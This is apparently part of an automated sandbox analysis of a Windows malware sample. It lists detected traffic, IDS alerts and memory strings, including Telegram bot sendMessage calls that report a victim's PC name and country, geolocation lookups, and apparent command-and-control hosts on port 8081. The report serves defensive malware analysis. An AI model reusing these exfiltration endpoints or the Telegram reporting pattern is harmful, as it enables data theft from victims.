                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49739 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49720 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49718 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49716 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49712 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49732 -> 104.21.32.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49725 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E34EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00E34EB5
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 14:33:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 14:34:06 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: svchost.exe, 00000003.00000003.2198648507.0000000007B20000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: svchost.exe, 00000006.00000002.4525232764.000000000531D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: svchost.exe, 00000003.00000002.4524898032.000000000543C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enhZ
                  Source: svchost.exe, 00000003.00000002.4524898032.0000000005446000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: svchost.exe, 00000003.00000002.4524898032.0000000005390000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005320000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000525F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005320000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: svchost.exe, 00000006.00000002.4525232764.00000000051F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
